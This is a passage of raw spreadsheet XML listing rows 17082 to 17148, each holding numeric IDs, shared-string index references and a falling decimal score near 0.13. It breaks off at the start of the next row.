    <row r="17082" ht="15.75" customHeight="1">
      <c r="A17082" s="1">
        <v>33039.0</v>
      </c>
      <c r="B17082" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C17082" s="2" t="s">
        <v>16468</v>
      </c>
      <c r="D17082" s="2">
        <v>1.0</v>
      </c>
      <c r="E17082" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17082" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17083" ht="15.75" customHeight="1">
      <c r="A17083" s="1">
        <v>10476.0</v>
      </c>
      <c r="B17083" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C17083" s="2" t="s">
        <v>16469</v>
      </c>
      <c r="D17083" s="2">
        <v>1.0</v>
      </c>
      <c r="E17083" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17083" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="17084" ht="15.75" customHeight="1">
      <c r="A17084" s="1">
        <v>27294.0</v>
      </c>
      <c r="B17084" s="2">
        <v>2.1289484E7</v>
      </c>
      <c r="C17084" s="2" t="s">
        <v>16470</v>
      </c>
      <c r="D17084" s="2">
        <v>1.0</v>
      </c>
      <c r="E17084" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17084" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="17085" ht="15.75" customHeight="1">
      <c r="A17085" s="1">
        <v>18447.0</v>
      </c>
      <c r="B17085" s="2">
        <v>5.2777984E7</v>
      </c>
      <c r="C17085" s="2" t="s">
        <v>16471</v>
      </c>
      <c r="D17085" s="2">
        <v>1.0</v>
      </c>
      <c r="E17085" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17085" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="17086" ht="15.75" customHeight="1">
      <c r="A17086" s="1">
        <v>13053.0</v>
      </c>
      <c r="B17086" s="2">
        <v>3.3185921E7</v>
      </c>
      <c r="C17086" s="2" t="s">
        <v>16472</v>
      </c>
      <c r="D17086" s="2">
        <v>1.0</v>
      </c>
      <c r="E17086" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17086" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="17087" ht="15.75" customHeight="1">
      <c r="A17087" s="1">
        <v>24147.0</v>
      </c>
      <c r="B17087" s="2">
        <v>1.0074892E7</v>
      </c>
      <c r="C17087" s="2" t="s">
        <v>16473</v>
      </c>
      <c r="D17087" s="2">
        <v>1.0</v>
      </c>
      <c r="E17087" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17087" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="17088" ht="15.75" customHeight="1">
      <c r="A17088" s="1">
        <v>21547.0</v>
      </c>
      <c r="B17088" s="2">
        <v>2.3552356E7</v>
      </c>
      <c r="C17088" s="2" t="s">
        <v>16474</v>
      </c>
      <c r="D17088" s="2">
        <v>1.0</v>
      </c>
      <c r="E17088" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17088" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="17089" ht="15.75" customHeight="1">
      <c r="A17089" s="1">
        <v>27879.0</v>
      </c>
      <c r="B17089" s="2">
        <v>2.3552355E7</v>
      </c>
      <c r="C17089" s="2" t="s">
        <v>16475</v>
      </c>
      <c r="D17089" s="2">
        <v>1.0</v>
      </c>
      <c r="E17089" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17089" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="17090" ht="15.75" customHeight="1">
      <c r="A17090" s="1">
        <v>18540.0</v>
      </c>
      <c r="B17090" s="2">
        <v>5.3118491E7</v>
      </c>
      <c r="C17090" s="2" t="s">
        <v>16476</v>
      </c>
      <c r="D17090" s="2">
        <v>1.0</v>
      </c>
      <c r="E17090" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17090" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17091" ht="15.75" customHeight="1">
      <c r="A17091" s="1">
        <v>21368.0</v>
      </c>
      <c r="B17091" s="2">
        <v>2.1486692E7</v>
      </c>
      <c r="C17091" s="2" t="s">
        <v>16477</v>
      </c>
      <c r="D17091" s="2">
        <v>1.0</v>
      </c>
      <c r="E17091" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17091" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17092" ht="15.75" customHeight="1">
      <c r="A17092" s="1">
        <v>23108.0</v>
      </c>
      <c r="B17092" s="2">
        <v>5104724.0</v>
      </c>
      <c r="C17092" s="2" t="s">
        <v>16478</v>
      </c>
      <c r="D17092" s="2">
        <v>1.0</v>
      </c>
      <c r="E17092" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17092" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17093" ht="15.75" customHeight="1">
      <c r="A17093" s="1">
        <v>26817.0</v>
      </c>
      <c r="B17093" s="2">
        <v>1.8751421E7</v>
      </c>
      <c r="C17093" s="2" t="s">
        <v>16479</v>
      </c>
      <c r="D17093" s="2">
        <v>1.0</v>
      </c>
      <c r="E17093" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17093" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17094" ht="15.75" customHeight="1">
      <c r="A17094" s="1">
        <v>28876.0</v>
      </c>
      <c r="B17094" s="2">
        <v>2.9155877E7</v>
      </c>
      <c r="C17094" s="2" t="s">
        <v>16420</v>
      </c>
      <c r="D17094" s="2">
        <v>1.0</v>
      </c>
      <c r="E17094" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17094" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17095" ht="15.75" customHeight="1">
      <c r="A17095" s="1">
        <v>33267.0</v>
      </c>
      <c r="B17095" s="2">
        <v>7367692.0</v>
      </c>
      <c r="C17095" s="2" t="s">
        <v>16480</v>
      </c>
      <c r="D17095" s="2">
        <v>1.0</v>
      </c>
      <c r="E17095" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17095" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="17096" ht="15.75" customHeight="1">
      <c r="A17096" s="1">
        <v>2554.0</v>
      </c>
      <c r="B17096" s="2">
        <v>3.4155584E7</v>
      </c>
      <c r="C17096" s="2" t="s">
        <v>16481</v>
      </c>
      <c r="D17096" s="2">
        <v>1.0</v>
      </c>
      <c r="E17096" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17096" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="17097" ht="15.75" customHeight="1">
      <c r="A17097" s="1">
        <v>15941.0</v>
      </c>
      <c r="B17097" s="2">
        <v>4.4742763E7</v>
      </c>
      <c r="C17097" s="2" t="s">
        <v>16482</v>
      </c>
      <c r="D17097" s="2">
        <v>1.0</v>
      </c>
      <c r="E17097" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17097" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="17098" ht="15.75" customHeight="1">
      <c r="A17098" s="1">
        <v>23962.0</v>
      </c>
      <c r="B17098" s="2">
        <v>9013438.0</v>
      </c>
      <c r="C17098" s="2" t="s">
        <v>16483</v>
      </c>
      <c r="D17098" s="2">
        <v>1.0</v>
      </c>
      <c r="E17098" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17098" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="17099" ht="15.75" customHeight="1">
      <c r="A17099" s="1">
        <v>32175.0</v>
      </c>
      <c r="B17099" s="2">
        <v>5.4639758E7</v>
      </c>
      <c r="C17099" s="2" t="s">
        <v>16484</v>
      </c>
      <c r="D17099" s="2">
        <v>1.0</v>
      </c>
      <c r="E17099" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17099" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="17100" ht="15.75" customHeight="1">
      <c r="A17100" s="1">
        <v>12824.0</v>
      </c>
      <c r="B17100" s="2">
        <v>3.1625406E7</v>
      </c>
      <c r="C17100" s="2" t="s">
        <v>16485</v>
      </c>
      <c r="D17100" s="2">
        <v>1.0</v>
      </c>
      <c r="E17100" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17100" s="2">
        <v>0.1318407960199005</v>
      </c>
    </row>
    <row r="17101" ht="15.75" customHeight="1">
      <c r="A17101" s="1">
        <v>22551.0</v>
      </c>
      <c r="B17101" s="2">
        <v>3.8221381E7</v>
      </c>
      <c r="C17101" s="2" t="s">
        <v>16486</v>
      </c>
      <c r="D17101" s="2">
        <v>1.0</v>
      </c>
      <c r="E17101" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17101" s="2">
        <v>0.1318407960199005</v>
      </c>
    </row>
    <row r="17102" ht="15.75" customHeight="1">
      <c r="A17102" s="1">
        <v>5715.0</v>
      </c>
      <c r="B17102" s="2">
        <v>4.6586084E7</v>
      </c>
      <c r="C17102" s="2" t="s">
        <v>16487</v>
      </c>
      <c r="D17102" s="2">
        <v>1.0</v>
      </c>
      <c r="E17102" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17102" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17103" ht="15.75" customHeight="1">
      <c r="A17103" s="1">
        <v>10456.0</v>
      </c>
      <c r="B17103" s="2">
        <v>1.0644007E7</v>
      </c>
      <c r="C17103" s="2" t="s">
        <v>16488</v>
      </c>
      <c r="D17103" s="2">
        <v>1.0</v>
      </c>
      <c r="E17103" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17103" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17104" ht="15.75" customHeight="1">
      <c r="A17104" s="1">
        <v>11415.0</v>
      </c>
      <c r="B17104" s="2">
        <v>2.1660749E7</v>
      </c>
      <c r="C17104" s="2" t="s">
        <v>16489</v>
      </c>
      <c r="D17104" s="2">
        <v>1.0</v>
      </c>
      <c r="E17104" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17104" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17105" ht="15.75" customHeight="1">
      <c r="A17105" s="1">
        <v>18094.0</v>
      </c>
      <c r="B17105" s="2">
        <v>5.1689912E7</v>
      </c>
      <c r="C17105" s="2" t="s">
        <v>16490</v>
      </c>
      <c r="D17105" s="2">
        <v>1.0</v>
      </c>
      <c r="E17105" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17105" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17106" ht="15.75" customHeight="1">
      <c r="A17106" s="1">
        <v>18763.0</v>
      </c>
      <c r="B17106" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C17106" s="2" t="s">
        <v>16491</v>
      </c>
      <c r="D17106" s="2">
        <v>1.0</v>
      </c>
      <c r="E17106" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17106" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17107" ht="15.75" customHeight="1">
      <c r="A17107" s="1">
        <v>19871.0</v>
      </c>
      <c r="B17107" s="2">
        <v>5.722713E7</v>
      </c>
      <c r="C17107" s="2" t="s">
        <v>16492</v>
      </c>
      <c r="D17107" s="2">
        <v>1.0</v>
      </c>
      <c r="E17107" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17107" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17108" ht="15.75" customHeight="1">
      <c r="A17108" s="1">
        <v>24291.0</v>
      </c>
      <c r="B17108" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C17108" s="2" t="s">
        <v>16493</v>
      </c>
      <c r="D17108" s="2">
        <v>1.0</v>
      </c>
      <c r="E17108" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17108" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17109" ht="15.75" customHeight="1">
      <c r="A17109" s="1">
        <v>32070.0</v>
      </c>
      <c r="B17109" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C17109" s="2" t="s">
        <v>16494</v>
      </c>
      <c r="D17109" s="2">
        <v>1.0</v>
      </c>
      <c r="E17109" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17109" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17110" ht="15.75" customHeight="1">
      <c r="A17110" s="1">
        <v>34102.0</v>
      </c>
      <c r="B17110" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C17110" s="2" t="s">
        <v>16495</v>
      </c>
      <c r="D17110" s="2">
        <v>1.0</v>
      </c>
      <c r="E17110" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17110" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="17111" ht="15.75" customHeight="1">
      <c r="A17111" s="1">
        <v>1447.0</v>
      </c>
      <c r="B17111" s="2">
        <v>2.6825804E7</v>
      </c>
      <c r="C17111" s="2" t="s">
        <v>16496</v>
      </c>
      <c r="D17111" s="2">
        <v>1.0</v>
      </c>
      <c r="E17111" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17111" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17112" ht="15.75" customHeight="1">
      <c r="A17112" s="1">
        <v>11570.0</v>
      </c>
      <c r="B17112" s="2">
        <v>2.2771777E7</v>
      </c>
      <c r="C17112" s="2" t="s">
        <v>16497</v>
      </c>
      <c r="D17112" s="2">
        <v>1.0</v>
      </c>
      <c r="E17112" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17112" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17113" ht="15.75" customHeight="1">
      <c r="A17113" s="1">
        <v>12693.0</v>
      </c>
      <c r="B17113" s="2">
        <v>3.073141E7</v>
      </c>
      <c r="C17113" s="2" t="s">
        <v>16498</v>
      </c>
      <c r="D17113" s="2">
        <v>1.0</v>
      </c>
      <c r="E17113" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17113" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17114" ht="15.75" customHeight="1">
      <c r="A17114" s="1">
        <v>15565.0</v>
      </c>
      <c r="B17114" s="2">
        <v>4.3429621E7</v>
      </c>
      <c r="C17114" s="2" t="s">
        <v>16499</v>
      </c>
      <c r="D17114" s="2">
        <v>1.0</v>
      </c>
      <c r="E17114" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17114" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17115" ht="15.75" customHeight="1">
      <c r="A17115" s="1">
        <v>16134.0</v>
      </c>
      <c r="B17115" s="2">
        <v>4.5528409E7</v>
      </c>
      <c r="C17115" s="2" t="s">
        <v>16500</v>
      </c>
      <c r="D17115" s="2">
        <v>1.0</v>
      </c>
      <c r="E17115" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17115" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17116" ht="15.75" customHeight="1">
      <c r="A17116" s="1">
        <v>23951.0</v>
      </c>
      <c r="B17116" s="2">
        <v>8905798.0</v>
      </c>
      <c r="C17116" s="2" t="s">
        <v>16501</v>
      </c>
      <c r="D17116" s="2">
        <v>1.0</v>
      </c>
      <c r="E17116" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17116" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17117" ht="15.75" customHeight="1">
      <c r="A17117" s="1">
        <v>25449.0</v>
      </c>
      <c r="B17117" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C17117" s="2" t="s">
        <v>16502</v>
      </c>
      <c r="D17117" s="2">
        <v>1.0</v>
      </c>
      <c r="E17117" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17117" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17118" ht="15.75" customHeight="1">
      <c r="A17118" s="1">
        <v>27766.0</v>
      </c>
      <c r="B17118" s="2">
        <v>2.3110234E7</v>
      </c>
      <c r="C17118" s="2" t="s">
        <v>16503</v>
      </c>
      <c r="D17118" s="2">
        <v>1.0</v>
      </c>
      <c r="E17118" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17118" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17119" ht="15.75" customHeight="1">
      <c r="A17119" s="1">
        <v>28321.0</v>
      </c>
      <c r="B17119" s="2">
        <v>2.5805647E7</v>
      </c>
      <c r="C17119" s="2" t="s">
        <v>16504</v>
      </c>
      <c r="D17119" s="2">
        <v>1.0</v>
      </c>
      <c r="E17119" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17119" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17120" ht="15.75" customHeight="1">
      <c r="A17120" s="1">
        <v>31294.0</v>
      </c>
      <c r="B17120" s="2">
        <v>4.9628683E7</v>
      </c>
      <c r="C17120" s="2" t="s">
        <v>16505</v>
      </c>
      <c r="D17120" s="2">
        <v>1.0</v>
      </c>
      <c r="E17120" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17120" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="17121" ht="15.75" customHeight="1">
      <c r="A17121" s="1">
        <v>9439.0</v>
      </c>
      <c r="B17121" s="2">
        <v>5.580628E7</v>
      </c>
      <c r="C17121" s="2" t="s">
        <v>16506</v>
      </c>
      <c r="D17121" s="2">
        <v>1.0</v>
      </c>
      <c r="E17121" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17121" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="17122" ht="15.75" customHeight="1">
      <c r="A17122" s="1">
        <v>25940.0</v>
      </c>
      <c r="B17122" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C17122" s="2" t="s">
        <v>16507</v>
      </c>
      <c r="D17122" s="2">
        <v>1.0</v>
      </c>
      <c r="E17122" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17122" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="17123" ht="15.75" customHeight="1">
      <c r="A17123" s="1">
        <v>29187.0</v>
      </c>
      <c r="B17123" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C17123" s="2" t="s">
        <v>16508</v>
      </c>
      <c r="D17123" s="2">
        <v>1.0</v>
      </c>
      <c r="E17123" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17123" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="17124" ht="15.75" customHeight="1">
      <c r="A17124" s="1">
        <v>25360.0</v>
      </c>
      <c r="B17124" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C17124" s="2" t="s">
        <v>16509</v>
      </c>
      <c r="D17124" s="2">
        <v>1.0</v>
      </c>
      <c r="E17124" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17124" s="2">
        <v>0.1315359477124183</v>
      </c>
    </row>
    <row r="17125" ht="15.75" customHeight="1">
      <c r="A17125" s="1">
        <v>17807.0</v>
      </c>
      <c r="B17125" s="2">
        <v>5.0832583E7</v>
      </c>
      <c r="C17125" s="2" t="s">
        <v>16510</v>
      </c>
      <c r="D17125" s="2">
        <v>1.0</v>
      </c>
      <c r="E17125" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17125" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="17126" ht="15.75" customHeight="1">
      <c r="A17126" s="1">
        <v>21160.0</v>
      </c>
      <c r="B17126" s="2">
        <v>1.8903095E7</v>
      </c>
      <c r="C17126" s="2" t="s">
        <v>16511</v>
      </c>
      <c r="D17126" s="2">
        <v>1.0</v>
      </c>
      <c r="E17126" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17126" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="17127" ht="15.75" customHeight="1">
      <c r="A17127" s="1">
        <v>23572.0</v>
      </c>
      <c r="B17127" s="2">
        <v>6212761.0</v>
      </c>
      <c r="C17127" s="2" t="s">
        <v>16512</v>
      </c>
      <c r="D17127" s="2">
        <v>1.0</v>
      </c>
      <c r="E17127" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17127" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="17128" ht="15.75" customHeight="1">
      <c r="A17128" s="1">
        <v>29503.0</v>
      </c>
      <c r="B17128" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C17128" s="2" t="s">
        <v>16513</v>
      </c>
      <c r="D17128" s="2">
        <v>1.0</v>
      </c>
      <c r="E17128" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17128" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="17129" ht="15.75" customHeight="1">
      <c r="A17129" s="1">
        <v>12858.0</v>
      </c>
      <c r="B17129" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C17129" s="2" t="s">
        <v>16514</v>
      </c>
      <c r="D17129" s="2">
        <v>1.0</v>
      </c>
      <c r="E17129" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17129" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17130" ht="15.75" customHeight="1">
      <c r="A17130" s="1">
        <v>21356.0</v>
      </c>
      <c r="B17130" s="2">
        <v>2.1366762E7</v>
      </c>
      <c r="C17130" s="2" t="s">
        <v>16515</v>
      </c>
      <c r="D17130" s="2">
        <v>1.0</v>
      </c>
      <c r="E17130" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17130" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17131" ht="15.75" customHeight="1">
      <c r="A17131" s="1">
        <v>22268.0</v>
      </c>
      <c r="B17131" s="2">
        <v>3.3114799E7</v>
      </c>
      <c r="C17131" s="2" t="s">
        <v>16516</v>
      </c>
      <c r="D17131" s="2">
        <v>1.0</v>
      </c>
      <c r="E17131" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17131" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17132" ht="15.75" customHeight="1">
      <c r="A17132" s="1">
        <v>23432.0</v>
      </c>
      <c r="B17132" s="2">
        <v>5649845.0</v>
      </c>
      <c r="C17132" s="2" t="s">
        <v>16517</v>
      </c>
      <c r="D17132" s="2">
        <v>1.0</v>
      </c>
      <c r="E17132" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17132" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17133" ht="15.75" customHeight="1">
      <c r="A17133" s="1">
        <v>25012.0</v>
      </c>
      <c r="B17133" s="2">
        <v>1.2780157E7</v>
      </c>
      <c r="C17133" s="2" t="s">
        <v>16518</v>
      </c>
      <c r="D17133" s="2">
        <v>1.0</v>
      </c>
      <c r="E17133" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17133" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17134" ht="15.75" customHeight="1">
      <c r="A17134" s="1">
        <v>25882.0</v>
      </c>
      <c r="B17134" s="2">
        <v>1.496847E7</v>
      </c>
      <c r="C17134" s="2" t="s">
        <v>16519</v>
      </c>
      <c r="D17134" s="2">
        <v>1.0</v>
      </c>
      <c r="E17134" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17134" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17135" ht="15.75" customHeight="1">
      <c r="A17135" s="1">
        <v>26705.0</v>
      </c>
      <c r="B17135" s="2">
        <v>1.8185033E7</v>
      </c>
      <c r="C17135" s="2" t="s">
        <v>16520</v>
      </c>
      <c r="D17135" s="2">
        <v>1.0</v>
      </c>
      <c r="E17135" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17135" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17136" ht="15.75" customHeight="1">
      <c r="A17136" s="1">
        <v>26862.0</v>
      </c>
      <c r="B17136" s="2">
        <v>1.9035839E7</v>
      </c>
      <c r="C17136" s="2" t="s">
        <v>16521</v>
      </c>
      <c r="D17136" s="2">
        <v>1.0</v>
      </c>
      <c r="E17136" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17136" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="17137" ht="15.75" customHeight="1">
      <c r="A17137" s="1">
        <v>6987.0</v>
      </c>
      <c r="B17137" s="2">
        <v>5.0049801E7</v>
      </c>
      <c r="C17137" s="2" t="s">
        <v>16522</v>
      </c>
      <c r="D17137" s="2">
        <v>1.0</v>
      </c>
      <c r="E17137" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17137" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="17138" ht="15.75" customHeight="1">
      <c r="A17138" s="1">
        <v>8469.0</v>
      </c>
      <c r="B17138" s="2">
        <v>5.401483E7</v>
      </c>
      <c r="C17138" s="2" t="s">
        <v>16523</v>
      </c>
      <c r="D17138" s="2">
        <v>1.0</v>
      </c>
      <c r="E17138" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17138" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="17139" ht="15.75" customHeight="1">
      <c r="A17139" s="1">
        <v>16550.0</v>
      </c>
      <c r="B17139" s="2">
        <v>4.6812547E7</v>
      </c>
      <c r="C17139" s="2" t="s">
        <v>16524</v>
      </c>
      <c r="D17139" s="2">
        <v>1.0</v>
      </c>
      <c r="E17139" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17139" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="17140" ht="15.75" customHeight="1">
      <c r="A17140" s="1">
        <v>20753.0</v>
      </c>
      <c r="B17140" s="2">
        <v>1.4878803E7</v>
      </c>
      <c r="C17140" s="2" t="s">
        <v>16525</v>
      </c>
      <c r="D17140" s="2">
        <v>1.0</v>
      </c>
      <c r="E17140" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17140" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="17141" ht="15.75" customHeight="1">
      <c r="A17141" s="1">
        <v>26735.0</v>
      </c>
      <c r="B17141" s="2">
        <v>1.827826E7</v>
      </c>
      <c r="C17141" s="2" t="s">
        <v>16526</v>
      </c>
      <c r="D17141" s="2">
        <v>1.0</v>
      </c>
      <c r="E17141" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17141" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="17142" ht="15.75" customHeight="1">
      <c r="A17142" s="1">
        <v>31724.0</v>
      </c>
      <c r="B17142" s="2">
        <v>5213419.0</v>
      </c>
      <c r="C17142" s="2" t="s">
        <v>16527</v>
      </c>
      <c r="D17142" s="2">
        <v>1.0</v>
      </c>
      <c r="E17142" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17142" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="17143" ht="15.75" customHeight="1">
      <c r="A17143" s="1">
        <v>25366.0</v>
      </c>
      <c r="B17143" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C17143" s="2" t="s">
        <v>16528</v>
      </c>
      <c r="D17143" s="2">
        <v>1.0</v>
      </c>
      <c r="E17143" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17143" s="2">
        <v>0.1304713804713805</v>
      </c>
    </row>
    <row r="17144" ht="15.75" customHeight="1">
      <c r="A17144" s="1">
        <v>824.0</v>
      </c>
      <c r="B17144" s="2">
        <v>2.1513988E7</v>
      </c>
      <c r="C17144" s="2" t="s">
        <v>16529</v>
      </c>
      <c r="D17144" s="2">
        <v>1.0</v>
      </c>
      <c r="E17144" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17144" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17145" ht="15.75" customHeight="1">
      <c r="A17145" s="1">
        <v>3236.0</v>
      </c>
      <c r="B17145" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C17145" s="2" t="s">
        <v>16530</v>
      </c>
      <c r="D17145" s="2">
        <v>1.0</v>
      </c>
      <c r="E17145" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17145" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17146" ht="15.75" customHeight="1">
      <c r="A17146" s="1">
        <v>4290.0</v>
      </c>
      <c r="B17146" s="2">
        <v>4.1907949E7</v>
      </c>
      <c r="C17146" s="2" t="s">
        <v>16531</v>
      </c>
      <c r="D17146" s="2">
        <v>1.0</v>
      </c>
      <c r="E17146" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17146" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17147" ht="15.75" customHeight="1">
      <c r="A17147" s="1">
        <v>5444.0</v>
      </c>
      <c r="B17147" s="2">
        <v>4.5625342E7</v>
      </c>
      <c r="C17147" s="2" t="s">
        <v>16532</v>
      </c>
      <c r="D17147" s="2">
        <v>1.0</v>
      </c>
      <c r="E17147" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17147" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17148" ht="15.75" customHeight="1">
      <c r="A17148" s="1">
        <v>6991.0</v>
      </c>
      <c r="B17148" s="2">
        <v>5.0073692E7</v>
      </c>
      <c r="C17148" s="2" t="s">
        <v>16533</v>
      </c>
      <c r="D17148" s="2">
        <v>1.0</v>
      </c>
      <c r="E17148" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17148" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17149" ht="15.75" customHeight="1">
